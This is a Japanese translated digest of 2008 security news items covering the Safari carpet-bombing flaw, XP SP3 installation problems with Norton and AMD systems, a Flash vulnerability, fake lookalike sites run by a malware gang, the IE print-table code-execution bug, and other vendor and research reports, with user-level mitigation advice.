 Microsoftの勧告は「リモートからのコードの実行を許可する」脅威と告げている。しかしながら、あなたがNitesh Dhanjani(この脆弱性の発見者)の仕事をチェックしたなら、この脆弱性がファイルでユーザを絨毯爆撃することをサイトに許可するだけであることを理解できる。Microsoftは、どのようなリモートコード実行について語っているのか?
 Aviv Raffによれば、多くの物語がある。そこにAvivが以前Microsoftに報告した方法同様に、Niteshの方法を使用してリモート実行を可能にする方法があるということが分かる。
 解決方法?? いたって簡単。この問題が解決するまでSafariを使用しないことだ。

Sysinternalsツールをインターネットから直接ロードし稼働する
heiseSecurity : News (2008/05/29)

 SysinternalのWindowsシステムユーティリティは完全なパッケージとして長く利用可能であったが、Microsoftは現在、.exeファイルとして直接ダウンロードする為に、それらをhttp://live.sysinternals.comで個別に提供している。
 このツールはzipファイルとしてhttp://live.sysinternals.com/Filesから直接ダウンロードすることもまた可能である。彼が探している物を知っている者なら誰でも、MicrosoftのSysinternalのWebサイトを経由する重い足取りを回避できる。そして、それは今Tecnetに統合された。
 Microsoftはまた、「我々はSysinternal Liveのベータ(あなたにSisinternalのツールを探し、手動でそれらをダウンロードすることなしにWebから直接実行するサービス)をアナウンスすることに興奮している」と宣言している。しかしながら、ツールの大多数はアドミニストレータ権限で使用される。heiseSecurityはこのオプションを使用することの見解を留保する。アドミニストレータ権限でWebをブラウズすることは一般的に回避されなければならないことである。
 我々は、この新しいWebサイトがずっと利用可能であるか否か認識していない。Readmeファイルを読むと、これは単なる代替配布メカニズムのテストである。
 丁度二年前、MicrosoftはWinternalsとSysinternalsを買収した。この会社はMarc RussinovichとBryce Cogswell(Windows世界で高く評価され、1996年にオリジナルのSysinternalsツールセットを作成した二人)によって設立された。Microsoftの live.sysinternals.comのページから明らかに欠落しているSysinternalsのオリジナルツールの一つはNTFSDOS(DOSブートディスクからNTFSファイルシステムをマウントしアクセスできる大変有用なユーティリティ)である。このツールは、未だに幾つかのシェアウェアサイトで利用可能である。

ワーム、スパム、マルウェアをGoogleEarthにマップする
F-Secure Weblog : News from the Lab (2008/05/31)

 Google Earthは素晴らしい。
 我々はワームの追跡にGoogle Earthを使用している。ワームが我々の監視システムに接触すれば、そのIPアドレスがログされ、次に経度と緯度に変換される。このデータの全ては、我々がGoogle Earthネットワークリンクで使用するXMLフィードに打ち込まれる。
 それはこのように見える。

Google Earth with Worms

 そして、これはかなりきちんとしているので、ワームは今日、現実の脅威ではない。我々は幾つかの新たなデータフィードの作業を続けている。
 スパムに話題を移す。これは単一の個人アカウントからのスパムの源のように見える

Google Earth with Worms and Spam

 次に、我々のworldmap.f-secure.comのデータがある。これもまた我々が研究に使用する内部システムにフィードされる。
 我々は、このようになるようにGoogle Earth用データを調整する。

Google Earth with Worms, Spam and Malware

 Bot監視フィードは同様にして稼働している。我々は来週時々ビデオのデモを実行するだろう。

MicrosoftはSafari絨毯爆撃を回避するようWindowsユーザを駆り立てている
Channel Register : Security (2008/05/31)

 Redmondから稀なセキュリティ警告

 Microsoftセキュリティチームは、悪意ある者が数百の実行ファイルを伴う悪意あるデスクトップを撒き散らすことを許可する奇妙な機能の調査が解決するまで、AppleのSafariブラウザの使用を停止するようユーザにアドバイスしている。

 Safariで罠が仕掛けられているサイトを訪問したWindowsユーザは、プロンプトなく悪意ある実行ファイルのダウンロードを強いられると、Microsoftは発言している。この複合型の脅威(Blended Threat ; ウイルスやワーム、トロイの木馬の性質に加え、不正侵入の手法などを組み合わせた攻撃)は、SafariのdefaultのダウンロードロケーションとWindowsデスクトップが実行ファイルを操作する方法に起因する。
 Microsoftの勧告は、「適切なアップデートがMicrosoftと(もしくは)Appleから利用可能になるまで、WebブラウザとしてSafariの使用を制限する」ようユーザに指示している。
 この忠告は、研究者Nitesh Dhanjaniが「Appleのブラウザは、ある種のファイルをダウンロードする前にユーザに許可を求めない」と通告した後、一週間が過ぎて出現した。悪意あるiframeに遭遇したときでさえ(最も信頼されているサイト上でさえ、今日では一般的出来事)、Safariは素直に、実行するように言われるていることを実行する(数百回ものファイルのダウンロードを含む)。
 Appleのセキュリティ専門家は(いわゆる絨毯爆撃脆弱性を既習)、これを明らかな脅威と見ていないと発言している。Cupertinoの研究者は、「不必要なダウンロードに対するハードルを上げる更なる措置」として幾つかの指摘された点を修正するかもしれないが、もしやるとしても、かなりの時間がかかるだろうとDhanjaniに対して記している。
 Appleの嘆かわしい拒否は、Microsoftのセキュリティ部門が尋常でない忠告を何故実行したかを多分説明している。我々は、この前いつRedmondがセキュリティ上の理由から主たる製品のインストールを回避するようユーザに促したか、思い出すことができない。Appleの代表者はこの件に関するコメントの要請に応じていない。
 そして、全てのMacユーザーが、彼らが無視できる問題であると決める前に、Microsoftの忠告は明らかにWindowsユーザに限定している。この絨毯爆撃のシナリオはOS Xでも実行されるというDhanjaniの発言を思い出しなさい。

DLLファイルのチェック方法
Windows Tips&Tricks : News (2008/05/28)

 Windowsオペレーティングシステムにおける苦痛の一つは多数のDLLファイルにある(私は、vlaurie.com/computers2/Articles/dll.htmでこのよううなファイルについて詳しく説明している)。時々、システム問題のトラブルシュートは特定のDLLファイルが実行していることを見つけることを必要とする。Microsoftは特定のDLLのの出身地とコンフリクトが存在するかもしれないバージョンを発見できるデータベースを保持している。

NortonソフトウェアはWindows XP SP3とコンフリクトする
Windows Secret : News Letter (2008/05/28)

 Symantec Corp.のアンチウィルスソフトウェアは、XP SP3のインストールがWindowsレジストリに不必要なキーを加えることで問題を発生させるかもしれない。
 Symantecはユーザに対してXP SP3の適用に先立って、SymProtectセキュリティ機能を無効化するようアドバイスしている。
 レジストリの修復は最新のXPパッチを必要とする。
 Windows XP SP3に関連して継続的に発生している一連の問題の最新の問題は、Symantec Nortonアンチウィルスに関することである。Symantecは、XP SP3をインストールする前にNortonの自己防御機能を無効化するようユーザに推奨している。
 Nortonサポートフォーラムでのポストで、Symantecの上級SQAマネージャReese Anschultzは、様々なSymantecセキュリティ製品中に見られるSymProtect機能を無効化するよう顧客に指示している。

    ・ Nortonインターネットセキュリティ2008及びNortonアンチウィルス2008で、これを実行する為には、XP SP3をインストールする前にこれらのプログラムのオプションページ上の「Norton製品の保護をオンにする〔推奨〕」のチェックを外す。XP SP3のインストールが完全に完了した後(【訳注】システムの再起動を含む)、オプションページを表示し、改めてこのオプションを有効にする。
    ・ Nortonシステムワークス2008では、設定メニューの下にある高度な設定オプション(Advanced Options)を開く、「次へ」をクリック、Nortonシステムワークスオプションを選択、一般タブを選択、「シマンテック製品の保護をオンにする」のチェックを外す。

 上記以外のNorton製品に関しては、Anschultzの投稿を参照。この投稿は、XP SP3をインストールする前に幾許かの機能を無効にしなければ、他のサードパーティー製セキュリティ製品も問題を発生させるかもしれないことをコメントしている。
 Windows Secretsの読者の中にはXP SP3を適用する前に完全にNortonアンチウィルスを削除した者もいる。この手段は極端であるかのように思われるが、オーストラリアの読者Bert Smithは、彼がVista SP1 を適用する前にNortonインターネットセキュリティ2008をアンインストールするために、Nortonリムーバルツールを使用して「以下の指示に従う」べきとSymantecの技術者によって告げられている。
 我々が現在認識している与えられたこと、ユーザがSP3(XPサービスパックの最新バージョンにして、最後のバージョン)を適用する前にNortonアンチウィルス製品をアンインストールすることは真に賢明であるかもしれない。Microsoft TechNetフォーラムでこの問題を同定した読者Jan Levineに感謝する。
 XP SP3のインストールがSymantecセキュリティ製品を損壊したことを発見した場合は、私の同僚MVP Bill Castnerが発明したRegistry fix(レジストリ修正ツール)がダウンロードできる(My "Fix"が表示されるまで、このページをスクロールダウンする)。Castnerは、自身のブログでXP SP3問題を追跡し続けているJesper Johanssonと共に、この問題を最初に特定した。
 Johanssonはまた、XP SP3が再起動の無限ループを発生させるAMDコンピュータ用のパッチを提供している。私はこの問題を5月22日のコラムに記述した。更なる情報に関しては以下のアイテムを参照。

XP SP3の無限再起動の治療方法
 あなたがAMDベースのPCを持っている一人であり、XP SP3適用後恒常的に再起動を繰り返すのであれば、修復する方法はここに存在する。

     システムが最初にブートしたとき、F8キーを押しWindowsのセーフモードに入る(【訳注】メーカーロゴ画面で、F8キーを連打し、メニュー画面を表示させ、セーフモードを選択する)。アドミニストレータアカウントでログインし、(【補注】画面左下の)スタートをクリック、ファイル名を指定して実行をクリックし、cmdと入力し、[Enter]を押す。コマンドウィンドウが開いたら、以下のコマンドをタイプする。(イコールの後ろに半角スペースを入力することを忘れるな。これは必要である)

    sc config intelppm start= disabled

 この問題はAMDベースのシステム上の現在のIntelドライバによって発生する。あなたのPCがAMDプロセッサーを使っているということを認識している場合だけ、上記のステップに従いなさい; Intelをベースとするマシンでこれを実行するとシステムを使えなくすることになりかねません。
 あなたのシステムが使用しているプロセッサを特定する為には、コントロールパネルのシステムを開き、一般タブをクリックしなさい(画像参照)。

 このウィンドウにリストされたプロセッサが”Intel”なら、上述したコマンドを実行してはならない。再起動を無限に繰り返すIntelベースのシステムは、それと関係の無い問題を持っているかもしれない。これは私が以前記述したように、アンチウィルス製品とのコンフリクトであるかもしれないし、未だ特定されていない完全に別の問題であるかもしれない。
 私が5月22日のコラムを書いたとき、XP SP3のインストールに関するラッシュは存在しなかった。我々がこの種のコンフリクトについて多くを認識するまでXP SP3のインストールを待機せよ。
 このPatch WatchコラムはWindowsと主たるWindowsアプリケーションのパッチに関する問題を露にする。Susan Bradleyは、小さなビジネスサーバーとネットワークセキュリティの領域における彼女の知識に関し、最近MicrosoftのMVP (Most Valuable Professional) アワードを受賞した。彼女はまたCalifornia CPAのパートナーでもある。

マルウェアの画像
Sunbelt : Blog (2008/05/29)

 今年今までのデスクトップハイジャックに関する我々の投票結果:

 これをプログラムした作者は明らかにインストーラを用意しようとしていない。そこで、彼らはユーザが偽のコードされたトロイをダウンロードしたとき、Windowsロシア語版のCalc.exe(電卓ソフト)を起動する。

 結果としてマルウェアでは無い。しかし、我々はこの画像を悪意ある物と思料する。

Flashに脆弱性
F-Secure Weblog : News from the Lab (2008/05/28)

 Adobe Flashの現在のバージョンに影響される深刻な脆弱性のレポートがある。そして、フィールド中にこの脆弱性の攻撃の証拠がある。9.0.124.0以前のバージョンは、リスクを含んでいると報告されている。しかしながら、我々がしばしば示唆したセキュリティリストに関する話題で、バージョン9.0.124.0は脆弱性が無く、そしてこの攻撃は、9.0.115.0と、それ以前のバージョンに対してのみ当に効果がある。
 あらゆる場合において、我々はFlashの脆弱性がSQLインジェクションアタックと組み合わせて使用されていることを確認し続けてきた。このSQL攻撃の詳細な情報に関してはPatrikの5月13日のポストを参照。大多数もしくは殆どの人々は多分、毎回Flashをアップデートしない。これが幾万ものハックされたサイトに対するSQLインジェクション攻撃と結合することが懸念の理由である。大多数のユーザはこの危険性がある。そして、彼らのFlashソフトウェアをアップデートすべきである。ShadowserverはFlashの脆弱性を狙ってくる幾つかのドメインをポストしている
 Adobeはこの問題を認識し調査中であるが、未だ完全なレポートを公開していない。我々は、9.0.124.0が影響を受けるか否かを、後日アップデートするだろう。
 他方、あなたが使用したいであろう、幾許かでもリスクを軽減する戦略があるかも。

 最初に、ユーザはFlashをアンインストールすることができる。しかし、これは膨大なWebサイトからFlashのインストールを頻繁に催促されるので、幾分腹立たしくもある。そこで他のオプションとしては、Flashをアップデートし、次に現在のFlashを無効化することである。
 WindowsコンピュータにFlashをインストールしているのであれば、「プログラムの追加と削除」は「サポート情報に関してはこちらをクリック(【訳注】このような表現のオプションがあるはずです)」リンクを含んでいる。
 Internet Explorer用ActiveXコンポーネント

 Firefoxプラグイン

 最新バージョンにアップデートする。このページでFlashのバージョンをテストできる。
 一旦アップデートしたなら、次のオプションは:
 Internet Explorerの場合は、Flashを無効化するために「アドオン管理」オプションを使用する。

 しかし、次にあなたは、Flash利用可能サイトで頻繁にポップアップが表示されることになる。

 代替の方法はレジストリ(.reg)ファイルを使用することである。このファイルはFlashを無効化する。そして、このファイルはIE中でFlashを有効にする。右クリック>保存(あなたにとって都合の良い場所にファイルを保存する)。(【補注】この二つのファイルを)必要に応じてクリックすることでFlashのON/OFFを切り替えることができる。
 .regファイル用の有用なツールは、John Hallerのサイトにある。

 次に、Firefox用として:
 我々はFlashblockとNoScriptの使用を示唆する。

 NoScriptは優秀なプラグインであり、あらゆる信頼されていないサイトからのFlashをブロックする。あなたが信頼しているサイトでは注意しなさい。今や信頼されているサイトでさえハックされている。セキュリティを意識した個人にとって必要なプラグインである。noscript.netからインストールできる。
 Flashblockはロードされる全てのFlashコンテントを妨げる。これは代替物を挿入し、それからユーザが熱望するFlashだけをユーザが切り替えられるようにする。flashblock.mozdev.orgからインストールできる。

アップデート

Security Focus BIDは情報を廃棄した。詳細はこちらを参照Adobeがアップデートを利用可能にした。
Adobe Flashバージョン 9.0.124.0 には、我々がフィールド中で確認してきた、この脆弱性を突く攻撃に対する脆弱性は存在しない。しかし、以前のFlashバージョンの脆弱性への攻撃をホストしている数多くのサイトがあるので、リスクがある。我々は強くアドバイスする。最低でもFlashを最新版にアップデートしなさい。
 ホームユーザは、システムをスキャンしアップデートを支援する我々のHealth Check(無料)を使用できる。

【訳注】今回のAdobe Flashの脆弱性問題は、最終的にSymantecの誤報と判明しましたがFlashには様々な脆弱性が存在するので、常に最新バージョンにアップデートするようにしてください。

PC World, CastleCops等の偽サイトが増殖中
Sunbelt : Blog (2008/05/22)

 今日の早期にポストした、インチキCastleCopsページに関する続編。更なる物語。
 同じIP(207.226.177.250)を共有する他のドメインがある。

    pepato org
    slim-cash com
    spyware-wiper com
    Cpaypal com
    Crazycounter net

 全て正当なサイトのコピーである。
 Pepatoはインチキのdvdplanet.comページをロードする。

Slim-cashは、Allposters.comになりすます。

 Spyware-wiperはpcwold.comになりすます。

 CrazyCounterは、European Space Agencyのコピーである。

 そして、Cpaypalは、AboutPayPal.orgのコピーである。

 これらのドメインはマルウェアギャング"Vladzone"に属している。暫く前に、彼らがwebhelper4u.com(Patrick Jordan、Sunbeltで働いている)とspamhuntress.com、そして、幾つかの他のサイトに対してDDoS攻撃を実行したと信じている。私はこのようなサイトを訪問しない…。

Googleページ上でSpamページが炸裂中
Sunbelt : Blog (2008/05/22)

 Googleグループにまたがって問題が存在している。現在、Googleのページはスパマーの攻撃を経験している。
 マルウェアへのダイレクトリンクは無い(即座に変更されるけれども)、主としてスパムサイトにリダイレクトされる。
 例として、過去24時間に加えられた結果を示す。

 このURLは特定の外観を持っている。例えば、

    b2006e.e52bb.googlepages com
    te09d0.e2ee.googlepages com

 これを修正するためGoogleが早急に彼らのアルゴリズムに手を加えることを希望する。

IEに、任意のコードを実行できる脆弱性
heiseSecurity : News (2008/05/16)

 Aviv Raffは巧妙に細工されたWebページをIEで印刷したとき、任意のプログラムが実行される脆弱性を発見した。この脆弱性はクロスゾーン スクリプトのセキュリティホールをベースにし、インターネットゾーンの代わりにローカルゾーンでコードを実行することをWebページに許可する。しかしながら、ユーザ の介入が要求される。
 Raffはこのセキュリティホールをデモするサンプルページを作成した。ユーザが"Print Table of Links"機能を使用して、このページを印刷したなら、このWebページはWindowsコンピュータをコールする。この攻撃は、IEによる警告はあるが、ユーザがアクティブコンテンツの実行を許可するか否かは関係ない。heiseSecurityは現行の全てのパッチを充てたWindows XP SP2とIE7で、この挙動を再現することができた。

 ユーザがIEでページを印刷する時、IEは印刷されるための新たなHTMLファイルを生み出すローカルスクリプトを使用する、とRaffは説明している。このHTMLはヘッダ、Webページのボディ、フッター、そして可能なら、Webページ中のリンクのテーブルも含む。しかしながら、スクリプトは、このリンク中に含まれるURLをチェックせず、表示されているとして、如何なるフィルタリングもせずに新たなHTMLファイルに加える。Internet Explorerでは、大抵のローカルスクリプトはインターネットゾーンで稼働するが。しかし、プリンティング スクリプトはローカルマシンゾーンで稼働する。これはセキュリティホールを開通させ、このユーザのマシン上で任意の実行コードを実行するための全てのJavaScriptの挿入を許可する。Webページに特別に細工したリンクを埋め込むことで、そして、リンクテーブルを含むページを訪問者に印刷させる為にちょっとしたソーシャルエンジニアリングで、例えば、アタッカーはユーザのコンピュータに任意のコードを挿入できる。Raffによれば、この脆弱性はIE7だけでなく、IE8ベータにも影響を与える。
 この脆弱性はWindows XPの下ではコードの実行を許可するが、アクティベートされたUser Account Control (UAC:ユーザー アカウント制御)の付属するWindows Vistaでは、アタッカーは情報を探り出すだけである。古いバージョンは、この問題に影響されるかもしれない。ユーザは、MicrosoftがパッチをリリースするまでリンクテーブルのついたWebページを印刷しないようにアドバイスされている。

ハッカーは600万チリ人の詳細な個人情報をポストした
Channel Register : Security (2008/05/12)

 証明の視点を持つハッカーは、情報を政府ウェブサイトから盗んだ後、、600万チリ人の詳細な個人情報をインターネット上にポストした。

 同定されていないハッカーが、政府所有の電話会社によって運営されているサイト(選挙管理委員会と教育省)からデータを盗んだ後、二つのWebサイト(ITサイト:FayerWayer、コミュニティサイト:ElAntro)上に名前、電話番号、住所 学歴の詳細を含むデータをポストした。重要なデータは政府が措置をとる前、この週末におよそ2時間利用可能だったと、El Mercurioが報じている。
 盗まれたデータが付属している宣言において、このハッカーは「全世界が見るために...チリにおいて個人情報が如何に保護されていないかを示すために...誰もその情報を守ることに思い悩んでいない」ことを示すためにポストしたと述べている。
 警察は、このハッカーを調査中である。チリ人の個人データは、全てのイタリア人労働者の徴税通知がオンラインにポストされた翌日に曝された。イタリア国税局は、愚かなこのアイデアが実現される前に、このプランが脱税を減少させるための誤ったプランの一部であるとして、このデータを故意に公開した。

脆弱性の概要
F-Secure Weblog : News from the Lab (2008/05/12)

 我々は今、ここに「脆弱性の概要」ページを持った。

Mozilla

     Mozilla Thunderbirdは、リモートの攻撃者によって脆弱性を攻撃されるクロスサイト スクリプティングとセキュリティバイパス脆弱性を通知した。Mozillaは、この脆弱性を軽減するため、最新バージョン 2.0.0.14をリリースした。
     この脆弱性に関する、より詳細な情報に関しては、こちら

Adobe

     リモートから脆弱性を攻撃することができ、ユーザのシステムを改竄できる複数の脆弱性がAdobe Reader(旧名、Acrobat Reader)中に存在することが通知された 。この脆弱性に関する、より詳細な情報に関しては、こちら

 Mozilla ThunderbirdとAdobe Readerの脆弱性あるバージョンを使用しているかどうか確認したいのであれば、F-Secure Health Checkでスキャンして欲しい。

Mozilla Thunderbirdの最新バージョンへのアドバイスは、こちら
Adobe Readerの最新バージョンへのアドバイスは、こちら

Vistaは、Windows2000よりマルウェアに弱い?
InformationWeek : News (2008/05/09)

 Microsoft Vistaは、Windows 2000よりマルウェアの影響を受けやすく、Windows XPより37%安全であるが、未だ多くの脆弱性がある。
 これはMicrosoftのソフトウェアの脆弱性の中のファイナンシャルに関心を持っているセキュリティベンダPC Tools Softwareの主張である。
 「皮肉にも、Vistaは今日、Windowsの最も安全なバージョンであるとMicrosoftのよってもてはやされていた。しかしながら、ThreatFire(PC Toolsのアンチウィルスソフト)コミュニティ内の140万以上のコンピュータ上から統計を取った最近の研究は、Windows Vistaが八年前のWindows2000よりマルウェアに対し影響を受けやすく、Windows XPより37%安全であった」とSimon Clausen(PC Toolsの最高経営責任者)は声明の中で発言している。
 PC ToolsのThreatFireセキュリティサービスのユーザから収集した統計によると、Vistaは1000コンピュータあたり639の脅威を通過させたが、同様に比較すると、Windows 2000が1000コンピュータあたり586脅威、Windows 2003が1000コンピュータあたり478脅威、Windows XPが1000コンピュータあたり1021脅威の通過であった。
 ThreatFireはシグネチャ マッチングよりむしろ挙動をベースとして悪意あるソフトウェアをブロックするアンチマルウェアシステムである。
 与えられた1000PCあたり639の感染割合は、ほぼVistaユーザの64%がマシンを改竄されている。
 PC Toolsの製品戦略部長Michael Greeneは、同定されたマルウェアはデスクトップを奪い、何か悪いことをする一歩手前にあると発言している。彼は、彼がThreat Fireに即座に利用可能なデータを持たせていないと発言したが、おそらくモニタされたマシンの幾つかは、このマルウェアの捕獲に失敗したサードパーティー製アンチウィルスを持っているだろうとも発言している。  この傾向(自動発生させられるマルウェアの変種に遅れずについていくシグネチャベースアンチウィルスの無力さ)が、PC ToolsがThreatFireを開発した理由であると、Greeneは説明している。
 MicrosoftのスポークスマンはPC Toolsの方法論がMicrosoftの方法論に適うかどうか疑問をはさんでいる。
 「我々は我々の製品をより安全にしようとして我々を支援する各個の研究と勇気ある研究者を高く評価する。しかしながら、これはアンチマルウェア会社の研究である。」「ThreatFire脆弱性比較数は、我々の悪意あるソフトウェア削除ツール(MSRT)(このツールは2007年12月時点で400万以上のマシンで稼働している)の発見した脆弱性と相関しない。2007年6月から2007年12月迄、MSRTはMSRTが稼働しているVistaマシンの2.8%でマルウェアを発見した。対して、XP SP2マシンでは7.2%、Windows 2000 SP4では5%、Windows 2000 SP3では12.2%である。Windows 2000に関しては、これはクライアントとサーバーの両方を含むことに注意」とMicrosoftのスポークスマンはE-Mail中で述べている。

Kill Bit設定用支援プログラム
heiseSecurity : News (2008/05/09)

 AxBan(セキュリティ エキスパートDavid Maynorによって提供されるフリーのツール)は、既知の脆弱性を含むActiveXコントロールのKill Bitを設定することができる。Internet Explorerへ、このようなコントロールのロードを妨げ、巧妙に細工されたWebページを使用した攻撃のリスクを軽減する。

 AxBanはMaynorによって維持管理される脆弱性あるActiveXコントロールのリストを含んでいる。そして、一回クリックするだけでこのようなコントロールにKill Bitを設定できる。リストは現在、セキュリティ上の脆弱性が既に発見され、脆弱性を攻撃するデモンストレーションがmilw0rm上に公開されている14のActiveXコントロールを含んでいる。このリストは最近報告されたMicrosoft WorksとReal PlayerのActiveXコントロール中のセキュリティホールを含んでいる。
 MicrosoftナレッジベースはKill Bitの設定の方法(【訳注】リンクを日本語版サイトに変更)を提供しているにも拘らず、記述されているプロセスはレジストリの直接編集に終始している。これはWindowsに詳しくないユーザにとっては危険な行為である。AxBanはレジストリ損壊のリスクを大変少なくするよう支援する。MaynorはActiveXコントロール中に新たな脆弱性が発見されたならアップデートすることを計画している。このツールは、.Net framework 2.0を必要とする。

********************************

ダウンロード : こちらのページから、UPDATE: AxBan can be downloaded from here. の部分の here のリンクをクリックする。
ダイレクトリンク : http://portal.erratasec.com/axb/AxBan.exe(いきなりプログラムがダウンロードされます)

スパマーがYahoo!認証メール(ドメインキーズ)を乱用している
heiseSecurity : News (2008/05/08)

 MessageLabsの2008年4月の月例報告によれば、スパマーはフィルターをバイパスするためにYahooのメールサーバを乱用中である。スパマーは彼らのE-MailヘッダにYahoo's DomainKeys Identified Mail (DKIM:ディーキム。【訳注】DKIMは、迷惑メールやフィッシング詐欺メールなど送信者を偽ったメールへの対策として提案されたもので、メールの送信時に電子署名をヘッダに付与し、メールを受け取った側が署名を照合することで、正しい送信者であるかを認証する技術)を使用して、デジタル署名をしている。その結果、スパムフィルターは、このE-Mailは正当な物と確認する。

Microsoft Windows XP SP3 をリリース
WashingtonPost : Security Fix (2008/05/06)

 Microsoftは本日遂にWindows XP ユーザに対してSP3をリリースした。アップデートは今Windows Updateと自動アップデートの両方で提供されている。Microsoftは先週SP3をリリースする予定だったが、彼らが提供する、知られていないプロダクトの互換問題が原因で土壇場でリリースを停止した。
 多くの読者が私に、このアップデートは本当に必要なのかどうか尋ねてきた。Microsoftが今迄にXP用にリリースしたセキュリティとセキュリティ以外のアップデートの全てを別とすれば、SP3中の新規な物は、たいして役には立たない物しか存在しない。
 以下にWindows XP SP3のインストールに関して知っておくべき幾つかについて記しておく。

 MicrosoftはSP3でXP中に如何なる重要なMicrosoft Vistaテクノロジも加えていないと発言している。驚くことはない。Microsoftは、SP3はXPの最後の作品だと発言していた。Microsoftは現在、今夏にXPの新しいライセンスの発生を停止することを計画している。しかしながら、消費者とPCメーカーはこの発言に大騒ぎを始めた最中である。私は、ある種彼らと同調している。XPは完璧ではない。しかし、私はXPを使用して成長し、XPを知り尽くしており、しかもXPは非常に安定している。私はWindows Vista (Ultimate)搭載のマシンを所有しているが、このようなことを全く発言することはできない。
 今までにリリースされたセキュリティアップデートとホットフィックス(例え、あなた方がセキュリティパッチを充て続けていたとしても、幾つかは持っていないかもしれない)に加えて、SP3は僅かながら拡張機能を含んでいる。これはXPでのユーザの経験を著しく変更するものではないと、Microsofstは発言している。
 一体何が追加されたのか? SP3に含まれるセキュリティとセキュリティ以外の追加は、平均的ユーザの為ではなく、よりビジネスで使用されるような機能である。私のマシンを無茶苦茶にするチャンスがある時、何故SP3をインストールするのか? と尋ねますか?
 私はSP3がマシンを無茶苦茶にするチャンスは殆ど無いと信じている。SP3(【訳注】原文はXP3となっているが、SP3のミスタイプと判断する)は、本日自動アップデート経由で私のマシンの一つに提供された。程なく、自動アップデートアイコンは消えた。そして、私は何がアップされたのか疑問に思い始めた。そこで、私は再起動した。ここでアップデートが私に告げたことは、パッチをインストールする準備ができたということであった。私にSP3をインストールし再起動することを望むかどうか尋ねてきた? 「Yes」をクリックし、およそ15分待った後、システムは再起動された。私のマシンはSP3に模様替えした後、何も不都合は無いかのようであるが、あなたの場合、その効果は異なるかもしれない。
 一般ユーザはSP3のインストールを数日から数週間待った方が良いと思っている。情報通の人々は、ある種のハードウェアとソフトウェア 製品を持っているユーザが問題(それらの幾つかは多分、回復や修正が困難)を発生させるだろうと忠告している。
 しかしながら、どうしてもスクラッチからXPのシステムを再構築することを既に計画しているのであれば、SP3はこのプロセスを合理化しているので、このような仕事にうってつけだろう。以前のサービスパック(【訳注】Windows XP SP1, SP2のこと)無しにXPをインストールした場合でさえ、SP3をインストールすると全てのセキュリティ アップデートは更新される。
 SP3があなたのPCを妨害するかもしれないという僅かな可能性を最小化するために、SP3をインストールする前にMicrosoftが推薦している、このリンクのステップを踏むことは多分良い考えである。
 SANS Internet Storm Centerの注意として、如何なる理由であろうともInternet Explorer 6を未だ使用しているユーザは、このサービスパックをインストールした後は、IE7にアップグレードできない。また、SP3をインストールした時、既にIE7をインストールしているのであれば、IE6に逆移行することはできない。
 最後に、Microsoftは先週SP3のリリースの延期をもたらした非互換性に関する問題を殆ど修正していない。代わりに、Microsoftはフィルターを設置したので、非互換のソフトウェアを稼働させているユーザはアップデートを提供されない。
 中小企業がMicrosoft Dynamics RMSを稼働している場合は、現時点では確実にSP3のインストールを延期させなさい。

Spam、30周年
McAfee Avert Labs Blog (2008/05/05)

 30周年おめでとう。
 2008年05月03日、スパムメールの30周年記念日である。そう、Gary Thuerk(当時、Digital Equipment Corporation (DEC)に雇用されていた)がインターネットの先駆者Advanced Research Projects Agency Network (ARPANET)上の全ての人に対して、全く初めて新製品の未承諾広告のアナウンスを配信して以来30年がたった。アメリカ防衛省の防衛高等研究計画局(DAPRA)によって開発されたARPANETは世界最初のパケット交換ネットワークであった。そして、我々が現在、World Wide Web(【訳注】WWW)と呼ぶ情報高速道路を敷いた。 ここをクリックすることで、この無害なメッセージと未承認コマーシャルE-Mailを取り巻くイベントの記事を閲覧できる。
SPAM(Hormel Foods Corporationによって販売されていた肉の缶詰の製品名SPAMに由来する)という用語は、望みもしない未承認コマーシャルメールの説明用に作られた。この用語が使用されるようになった経緯はここで見ることができる。この用語は早期とSPAMが本格的に開始された1994年まで、殆ど使用されていなかった。信頼される広告形式としての故意のコマーシャルスパムは法律事務所(Canter & Siegel)によって開始された。1994年、この会社は6000以上のUsenetニュースグループに対し彼らの移民サービスのメッセージ広告を送信した。彼らはこのE-Mailの配布を自動化するためにmass-mailer(マスメーラ)ソフトウェアを開発した。これは今日でもスパマーによって使用されている。
 過去30年に渡り、スパムの容貌は単純なテキスト形式から、専門用語の羅列されたテキスト形式、フィッシング メール、スパム・マルウェアへと劇的に変化した。そして、画像スパム、スピア フィッシング(【訳注】特定の人を狙って偽のメールを送り、パスワードや個人情報などを詐取する詐欺)、添付ファイルスパム、最近ではMP3ベースのスパムと進化している。草創期、スパムは単一のユーザアカウントに送信された。後に、スパマーはオープン メール サービスを通してメッセージを押し付けた。今日、このような不要なE-Mailは、典型的にはゾンビ化されたマシン(マルウェアライターによって、非常に効果的に巨大な数のスパムを送信するよう設計されている)の巨大なネットワーク経由で送信される。スパミングは新しい場所に浸み込み、新たな形式に姿を変える。スパムはニュースグループとE-Mailスパミングからインスタント メッセージ、携帯電話スパム、ブログと検索結果を巧みに取り扱うスパムへと進化した。
 2006年までにスパムは存在できなくなるだろう、と言うビル・ゲイツの予測にもかかわらず、終わりが見えていない。Controlling the Assault of Non-Solicited Pornography And Marketing Act of 2003(CAN-SPAM法。【訳注】詳細はコチラ:http://ew.hitachi-system.co.jp/w/CAN-SPAME6B395.html)のようなスパムの規制を支援するためにもたらされた最近の法律があるにも拘らず。なぜ法は有効に機能しないのか? 主たる理由は、今日のスパマー(金銭を獲得することを目的とする)は、殆どアンチスパム法の規制を受けない国で操作している。
 ある意味、ビル・ゲイツの予測は、スパムフィルタリングソリューションが、送信されてくる殆ど全てのスパムを検出しフィルタするために、この期間に開発されたことに関しては正しかった。しかし、これはスパムを完全に廃絶することよりむしろ、問題を掃除している。私は誰もスパムを減少させるための「電子メール税」の導入を気に入るとは思わない。そして、Challenge/Responseシステムが不要なメールや緩慢なコミュニケーションに唯一貢献できる。私は、IPS(インターネット サービス プロバイダ)やソースでスパムをフィルターしインチキの“bullet proof”ISPをブロックするためのインターネット バックボーン プロバイダの一部との協調的努力をもたらすだろうと、個人的に考えている。ハイジャックされスパムを送信しているPCを同定し分離するテクノロジは既に存在するが、ISPは大変な競争と価格に敏感な市場でこれらシステムを実現するために必要なこのインフラストラクチャとカスタマーサポートに最大限の努力を投じることを嫌っているように見える。より良い代替は、新規な、ソースでスパムメールを削除することを容易にするより安全なメールプロトコルへの移行かもしれない。
 送られたスパムをブロックする、より創造的な方法を加えるなら、それはSMTP応答をアップグレードすることか? あるいは、我々が政府の立法行為をより必要とするか? あるいは、全く何か他のことか? スパマーを廃業させるのに30年かけるか? 私はそれを望まない!

Thunderbird 2.0.0.14がリリースされた
heiseSecurity : News (2008/05/02)

